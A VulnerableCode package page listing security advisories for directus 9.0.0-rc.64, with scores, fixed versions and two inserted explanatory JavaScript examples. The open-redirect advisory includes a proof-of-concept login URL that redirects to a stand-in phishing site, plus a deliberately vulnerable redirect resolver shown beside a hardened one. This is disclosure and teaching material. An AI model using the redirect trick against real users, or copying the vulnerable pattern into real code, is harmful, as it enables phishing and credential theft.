Look up vulnerable packages by Package URL (purl).

Purl pkg:npm/directus@9.0.0-rc.64
Type npm
Namespace
Name directus
Version 9.0.0-rc.64
Qualifiers
Subpath
Is_vulnerable true
Next_non_vulnerable_version 11.3.3
Latest_non_vulnerable_version 11.17.0
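Everything on this page hangs off the Package URL in the header above, so it is worth seeing how that string decomposes into the type, namespace, name, version, qualifiers and subpath fields listed. The following is an added example, not VulnerableCode's or the purl project's own code: a small parser that splits a purl into those fields and a formatter that reassembles it. The scoped-package purl it is also exercised on (`pkg:npm/%40scope/pkg@...`) is constructed for the example.

```javascript
// Added example: minimal Package URL (purl) parser/formatter, not VulnerableCode code.
// A purl has the shape pkg:type/namespace/name@version?qualifiers#subpath, with
// namespace, name, version and qualifier values percent-encoded.

// Constructed scoped-package purl used to exercise every field.
const SCOPED_EXAMPLE = 'pkg:npm/%40scope/pkg@1.2.3?repository_url=https://registry.example.org#src/index.js';

function parsePurl(purl) {
  if (typeof purl !== 'string' || !purl.startsWith('pkg:')) throw new Error('not a purl: ' + purl);
  let rest = purl.slice('pkg:'.length).replace(/^\/+/, ''); // tolerate "pkg://"

  // subpath: everything after the first '#', with empty, "." and ".." segments dropped
  let subpath = '';
  const hash = rest.indexOf('#');
  if (hash !== -1) {
    subpath = rest.slice(hash + 1).split('/')
      .filter((s) => s && s !== '.' && s !== '..')
      .map(decodeURIComponent).join('/');
    rest = rest.slice(0, hash);
  }

  // qualifiers: key=value pairs after the first '?', keys are case-insensitive
  const qualifiers = {};
  const q = rest.indexOf('?');
  if (q !== -1) {
    for (const pair of rest.slice(q + 1).split('&')) {
      if (!pair) continue;
      const eq = pair.indexOf('=');
      const key = (eq === -1 ? pair : pair.slice(0, eq)).toLowerCase();
      const value = eq === -1 ? '' : decodeURIComponent(pair.slice(eq + 1));
      if (value) qualifiers[key] = value;
    }
    rest = rest.slice(0, q);
  }

  // version: after the LAST raw '@'. Scoped npm names encode their '@' as %40,
  // so a raw '@' can only be the version separator.
  let version = '';
  const at = rest.lastIndexOf('@');
  if (at !== -1) {
    version = decodeURIComponent(rest.slice(at + 1));
    rest = rest.slice(0, at);
  }

  // type / namespace / name
  const segments = rest.split('/').filter(Boolean);
  if (segments.length < 2) throw new Error('purl needs a type and a name: ' + purl);
  const type = segments.shift().toLowerCase();
  const name = decodeURIComponent(segments.pop());
  const namespace = segments.map(decodeURIComponent).join('/');
  return { type, namespace, name, version, qualifiers, subpath };
}

function formatPurl({ type, namespace = '', name, version = '', qualifiers = {}, subpath = '' }) {
  // qualifier values keep ':' and '/' readable, everything else is percent-encoded
  const encodeValue = (v) => encodeURIComponent(v).replace(/%3A/gi, ':').replace(/%2F/gi, '/');
  let out = 'pkg:' + type.toLowerCase() + '/';
  if (namespace) out += namespace.split('/').map(encodeURIComponent).join('/') + '/';
  out += encodeURIComponent(name);
  if (version) out += '@' + encodeURIComponent(version);
  const keys = Object.keys(qualifiers).sort();
  if (keys.length) out += '?' + keys.map((k) => k.toLowerCase() + '=' + encodeValue(qualifiers[k])).join('&');
  if (subpath) out += '#' + subpath.split('/').map(encodeURIComponent).join('/');
  return out;
}

console.log(parsePurl('pkg:npm/directus@9.0.0-rc.64'));
console.log(parsePurl(SCOPED_EXAMPLE));
```

Splitting the version at the last raw `@` is the detail that matters for npm: a scoped name such as `@scope/pkg` only survives the round trip because its leading `@` is carried as `%40`.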
Affected_by_vulnerabilities
0
url VCID-1hn2-pjm6-dyhj
vulnerability_id VCID-1hn2-pjm6-dyhj
summary
Duplicate
This advisory duplicates another.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-26969
reference_id
reference_type
scores
0
value 0.00909
scoring_system epss
scoring_elements 0.76152
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-26969
1
reference_url https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/
url https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
2
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
3
reference_url https://github.com/directus/directus/blob/8daed9c41baeaf1d08c1e292bf9f0dcef65e48fb/docs/configuration/config-options.md
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/
url https://github.com/directus/directus/blob/8daed9c41baeaf1d08c1e292bf9f0dcef65e48fb/docs/configuration/config-options.md
4
reference_url https://github.com/directus/directus/pull/12022
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/
url https://github.com/directus/directus/pull/12022
5
reference_url https://github.com/directus/directus/releases/tag/v9.7.0
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/
url https://github.com/directus/directus/releases/tag/v9.7.0
6
reference_url https://security.snyk.io/vuln/SNYK-JS-DIRECTUS-2441822
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-04-14T14:53:09Z/
url https://security.snyk.io/vuln/SNYK-JS-DIRECTUS-2441822
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-26969
reference_id CVE-2022-26969
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-26969
8
reference_url https://github.com/advisories/GHSA-g27j-74fp-xfpr
reference_id GHSA-g27j-74fp-xfpr
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-g27j-74fp-xfpr
9
reference_url https://github.com/directus/directus/security/advisories/GHSA-g27j-74fp-xfpr
reference_id GHSA-g27j-74fp-xfpr
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus/security/advisories/GHSA-g27j-74fp-xfpr
fixed_packages
0
url pkg:npm/directus@9.7.0
purl pkg:npm/directus@9.7.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3cgw-zr3k-3fen
1
vulnerability VCID-8r4e-a1vf-9bd9
2
vulnerability VCID-9gba-zszk-p3h6
3
vulnerability VCID-eb8p-vqjt-yfb8
4
vulnerability VCID-ejme-tqn4-byhk
5
vulnerability VCID-et4m-8y15-9fb9
6
vulnerability VCID-eygf-cb4y-hqd3
7
vulnerability VCID-gjju-tu4e-gqfc
8
vulnerability VCID-hrqc-8err-4fbx
9
vulnerability VCID-kqs7-8txh-jyc8
10
vulnerability VCID-m3wb-sstx-v3d6
11
vulnerability VCID-msb5-197k-a3er
12
vulnerability VCID-szny-2sbf-v7de
13
vulnerability VCID-v4vz-smcx-gygb
14
vulnerability VCID-wgag-36wa-qyay
15
vulnerability VCID-xt9c-32g5-mqes
16
vulnerability VCID-yutw-33sk-5fg3
17
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.7.0
aliases CVE-2022-26969, GHSA-g27j-74fp-xfpr, GMS-2022-677
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1hn2-pjm6-dyhj
1
url VCID-3cgw-zr3k-3fen
vulnerability_id VCID-3cgw-zr3k-3fen
summary
Session Token in URL in directus
### Impact

When reaching the /files page, a JWT is passed via GET request. Inclusion of session tokens in URLs poses a security risk as URLs are often logged in various places (e.g., web server logs, browser history). Attackers gaining access to these logs may hijack active user sessions, leading to unauthorized access to sensitive information or actions on behalf of the user.

### Patches

Fixed in directus 10.10.0 (the fixed_packages entry below).

### Workarounds

There's no workaround available.

### References

See the references below, including GHSA-2ccr-g2rv-h677 and CVE-2024-28238.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-28238
reference_id
reference_type
scores
0
value 0.0009
scoring_system epss
scoring_elements 0.2556
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-28238
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 2.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-28238
reference_id CVE-2024-28238
reference_type
scores
0
value 2.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-28238
3
reference_url https://github.com/advisories/GHSA-2ccr-g2rv-h677
reference_id GHSA-2ccr-g2rv-h677
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-2ccr-g2rv-h677
4
reference_url https://github.com/directus/directus/security/advisories/GHSA-2ccr-g2rv-h677
reference_id GHSA-2ccr-g2rv-h677
reference_type
scores
0
value 2.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-02T19:50:33Z/
url https://github.com/directus/directus/security/advisories/GHSA-2ccr-g2rv-h677
fixed_packages
0
url pkg:npm/directus@10.10.0
purl pkg:npm/directus@10.10.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7fzh-j76t-5kd3
1
vulnerability VCID-8uym-xka8-cybb
2
vulnerability VCID-eb8p-vqjt-yfb8
3
vulnerability VCID-kqs7-8txh-jyc8
4
vulnerability VCID-m3wb-sstx-v3d6
5
vulnerability VCID-m5ng-dsfx-6qev
6
vulnerability VCID-msb5-197k-a3er
7
vulnerability VCID-wgag-36wa-qyay
8
vulnerability VCID-xc7t-gwaz-ckeu
9
vulnerability VCID-xt9c-32g5-mqes
10
vulnerability VCID-yutw-33sk-5fg3
11
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.10.0
aliases CVE-2024-28238, GHSA-2ccr-g2rv-h677
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3cgw-zr3k-3fen
2
url VCID-8r4e-a1vf-9bd9
vulnerability_id VCID-8r4e-a1vf-9bd9
summary
URL Redirection to Untrusted Site in OAuth2/OpenID in directus
### Summary
The authentication API accepts a `redirect` parameter that can be abused as an open redirect when a user logs in through an SSO provider, for example `/auth/login/google?redirect=...` (see https://docs.directus.io/reference/authentication.html#login-using-sso-providers).

### Details
After a successful login via the Auth API, a GET request to `directus/auth/login/google?redirect=http://malicious-fishing-site.com` redirects the browser to the supplied URL; the relevant code appears to be https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L394. Credentials do not seem to be passed to the attacker's site, but a user can be phished into clicking a link to the legitimate Directus site and then be taken to a malicious page made to look like an error message such as "Your password needs to be updated", in order to phish the current password.

### PoC
Enable any auth provider on a Directus instance. Form a link of the form `directus-instance/auth/login/:provider_id?redirect=http://malicious-fishing-site.com`, log in, and observe that you are taken to the malicious site. Tested with the `ory` OAuth2 integration.

### Impact
Users who log in to Directus via OAuth2.
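The open redirect described above comes down to trusting the `redirect` query parameter verbatim. The following is an added example (not Directus code and not the linked fix commit): a vulnerable resolver beside a hardened one that resolves the candidate against the instance's public URL and accepts only same-origin targets or an explicitly allow-listed origin. `https://cms.example.com` and `https://app.example.com` are constructed values.

```javascript
// Added example (not Directus code): resolving the post-login `redirect`
// parameter. PUBLIC_URL and REDIRECT_ALLOW_LIST are constructed values.
const PUBLIC_URL = 'https://cms.example.com';
const DEFAULT_LANDING = PUBLIC_URL + '/admin/login';
const REDIRECT_ALLOW_LIST = ['https://app.example.com'];

// Vulnerable shape: the query string decides where the browser goes next.
function resolveRedirectVulnerable(query) {
  return query.redirect || DEFAULT_LANDING;
}

// Browsers treat "\" like "/" in http(s) URLs, so "/\evil.example" is really
// "//evil.example"; normalise before any check so both are judged the same way.
function normaliseCandidate(candidate) {
  return candidate.replace(/\\/g, '/');
}

// Accept only targets whose resolved origin is this instance or an
// allow-listed origin. Absolute URLs to other hosts, protocol-relative URLs,
// javascript:/data: schemes and userinfo tricks such as
// https://cms.example.com@evil.example all end up with a foreign origin or a
// non-http scheme and are rejected.
function isSafeRedirect(candidate) {
  if (typeof candidate !== 'string' || candidate.length === 0) return false;
  const normalised = normaliseCandidate(candidate);
  if (normalised.startsWith('//')) return false;
  let url;
  try {
    url = new URL(normalised, PUBLIC_URL); // relative paths resolve against our own origin
  } catch (e) {
    return false;
  }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return false;
  const allowedOrigins = new Set([
    new URL(PUBLIC_URL).origin,
    ...REDIRECT_ALLOW_LIST.map((o) => new URL(o).origin),
  ]);
  return allowedOrigins.has(url.origin);
}

// Hardened shape: unknown or unsafe targets fall back to the default landing page.
function resolveRedirectHardened(query) {
  if (!isSafeRedirect(query.redirect)) return DEFAULT_LANDING;
  return new URL(normaliseCandidate(query.redirect), PUBLIC_URL).href;
}

console.log(resolveRedirectVulnerable({ redirect: 'http://malicious-fishing-site.com' }));
console.log(resolveRedirectHardened({ redirect: 'http://malicious-fishing-site.com' }));
```

Comparing the parsed `origin` (scheme, host and port together) rather than string prefixes is what defeats the `cms.example.com.evil.example` and `cms.example.com@evil.example` variants; a prefix check on the raw string passes both.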
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-28239
reference_id
reference_type
scores
0
value 0.0023
scoring_system epss
scoring_elements 0.45793
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-28239
1
reference_url https://docs.directus.io/reference/authentication.html#login-using-sso-providers
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-13T16:10:42Z/
url https://docs.directus.io/reference/authentication.html#login-using-sso-providers
2
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
3
reference_url https://github.com/directus/directus/commit/5477d7d61babd7ffc2f835d399bf79611b15b203
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-13T16:10:42Z/
url https://github.com/directus/directus/commit/5477d7d61babd7ffc2f835d399bf79611b15b203
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-28239
reference_id CVE-2024-28239
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-28239
5
reference_url https://github.com/advisories/GHSA-fr3w-2p22-6w7p
reference_id GHSA-fr3w-2p22-6w7p
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-fr3w-2p22-6w7p
6
reference_url https://github.com/directus/directus/security/advisories/GHSA-fr3w-2p22-6w7p
reference_id GHSA-fr3w-2p22-6w7p
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-13T16:10:42Z/
url https://github.com/directus/directus/security/advisories/GHSA-fr3w-2p22-6w7p
fixed_packages
0
url pkg:npm/directus@10.10.0
purl pkg:npm/directus@10.10.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7fzh-j76t-5kd3
1
vulnerability VCID-8uym-xka8-cybb
2
vulnerability VCID-eb8p-vqjt-yfb8
3
vulnerability VCID-kqs7-8txh-jyc8
4
vulnerability VCID-m3wb-sstx-v3d6
5
vulnerability VCID-m5ng-dsfx-6qev
6
vulnerability VCID-msb5-197k-a3er
7
vulnerability VCID-wgag-36wa-qyay
8
vulnerability VCID-xc7t-gwaz-ckeu
9
vulnerability VCID-xt9c-32g5-mqes
10
vulnerability VCID-yutw-33sk-5fg3
11
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.10.0
aliases CVE-2024-28239, GHSA-fr3w-2p22-6w7p
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8r4e-a1vf-9bd9
3
url VCID-9gba-zszk-p3h6
vulnerability_id VCID-9gba-zszk-p3h6
summary
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-36031
reference_id
reference_type
scores
0
value 0.0026
scoring_system epss
scoring_elements 0.495
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-36031
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-36031
reference_id CVE-2022-36031
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-36031
3
reference_url https://github.com/advisories/GHSA-77qm-wvqq-fg79
reference_id GHSA-77qm-wvqq-fg79
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-77qm-wvqq-fg79
4
reference_url https://github.com/directus/directus/security/advisories/GHSA-77qm-wvqq-fg79
reference_id GHSA-77qm-wvqq-fg79
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:45:00Z/
url https://github.com/directus/directus/security/advisories/GHSA-77qm-wvqq-fg79
fixed_packages
0
url pkg:npm/directus@9.15.0
purl pkg:npm/directus@9.15.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3cgw-zr3k-3fen
1
vulnerability VCID-8r4e-a1vf-9bd9
2
vulnerability VCID-eb8p-vqjt-yfb8
3
vulnerability VCID-ejme-tqn4-byhk
4
vulnerability VCID-et4m-8y15-9fb9
5
vulnerability VCID-eygf-cb4y-hqd3
6
vulnerability VCID-gjju-tu4e-gqfc
7
vulnerability VCID-hrqc-8err-4fbx
8
vulnerability VCID-kqs7-8txh-jyc8
9
vulnerability VCID-m3wb-sstx-v3d6
10
vulnerability VCID-msb5-197k-a3er
11
vulnerability VCID-szny-2sbf-v7de
12
vulnerability VCID-v4vz-smcx-gygb
13
vulnerability VCID-wgag-36wa-qyay
14
vulnerability VCID-xc7t-gwaz-ckeu
15
vulnerability VCID-xt9c-32g5-mqes
16
vulnerability VCID-yutw-33sk-5fg3
17
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.15.0
aliases CVE-2022-36031, GHSA-77qm-wvqq-fg79
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-9gba-zszk-p3h6
4
url VCID-eb8p-vqjt-yfb8
vulnerability_id VCID-eb8p-vqjt-yfb8
summary
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-34708
reference_id
reference_type
scores
0
value 0.00324
scoring_system epss
scoring_elements 0.55666
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-34708
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/commit/e70a90c267bea695afce6545174c2b77517d617b
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-15T15:21:26Z/
url https://github.com/directus/directus/commit/e70a90c267bea695afce6545174c2b77517d617b
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-34708
reference_id CVE-2024-34708
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-34708
4
reference_url https://github.com/advisories/GHSA-p8v3-m643-4xqx
reference_id GHSA-p8v3-m643-4xqx
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-p8v3-m643-4xqx
5
reference_url https://github.com/directus/directus/security/advisories/GHSA-p8v3-m643-4xqx
reference_id GHSA-p8v3-m643-4xqx
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-15T15:21:26Z/
url https://github.com/directus/directus/security/advisories/GHSA-p8v3-m643-4xqx
fixed_packages
0
url pkg:npm/directus@10.11.0
purl pkg:npm/directus@10.11.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-kqs7-8txh-jyc8
1
vulnerability VCID-m3wb-sstx-v3d6
2
vulnerability VCID-m5ng-dsfx-6qev
3
vulnerability VCID-msb5-197k-a3er
4
vulnerability VCID-wgag-36wa-qyay
5
vulnerability VCID-xc7t-gwaz-ckeu
6
vulnerability VCID-xt9c-32g5-mqes
7
vulnerability VCID-yutw-33sk-5fg3
8
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.11.0
aliases CVE-2024-34708, GHSA-p8v3-m643-4xqx
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-eb8p-vqjt-yfb8
5
url VCID-ejme-tqn4-byhk
vulnerability_id VCID-ejme-tqn4-byhk
summary
Directus version number disclosure
### Impact

The exact Directus version number is shipped in the compiled JS bundles, which are accessible without authentication. With this information an attacker can trivially look up known vulnerabilities in Directus core or any of its bundled dependencies for that specific running version.

### Patches

The problem has been resolved in versions 10.8.3 and newer

### Workarounds

None
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-27296
reference_id
reference_type
scores
0
value 0.00437
scoring_system epss
scoring_elements 0.63372
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-27296
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/commit/a5a1c26ac48795ed3212a4c51b9523588aff4fa0
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-01T19:28:33Z/
url https://github.com/directus/directus/commit/a5a1c26ac48795ed3212a4c51b9523588aff4fa0
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-27296
reference_id CVE-2024-27296
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-27296
4
reference_url https://github.com/advisories/GHSA-5mhg-wv8w-p59j
reference_id GHSA-5mhg-wv8w-p59j
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5mhg-wv8w-p59j
5
reference_url https://github.com/directus/directus/security/advisories/GHSA-5mhg-wv8w-p59j
reference_id GHSA-5mhg-wv8w-p59j
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-01T19:28:33Z/
url https://github.com/directus/directus/security/advisories/GHSA-5mhg-wv8w-p59j
fixed_packages
0
url pkg:npm/directus@10.8.3
purl pkg:npm/directus@10.8.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3cgw-zr3k-3fen
1
vulnerability VCID-8r4e-a1vf-9bd9
2
vulnerability VCID-eb8p-vqjt-yfb8
3
vulnerability VCID-kqs7-8txh-jyc8
4
vulnerability VCID-m3wb-sstx-v3d6
5
vulnerability VCID-msb5-197k-a3er
6
vulnerability VCID-wgag-36wa-qyay
7
vulnerability VCID-xc7t-gwaz-ckeu
8
vulnerability VCID-xt9c-32g5-mqes
9
vulnerability VCID-yutw-33sk-5fg3
10
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.8.3
aliases CVE-2024-27296, GHSA-5mhg-wv8w-p59j
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ejme-tqn4-byhk
6
url VCID-et4m-8y15-9fb9
vulnerability_id VCID-et4m-8y15-9fb9
summary
Exposure of Sensitive Information to an Unauthorized Actor
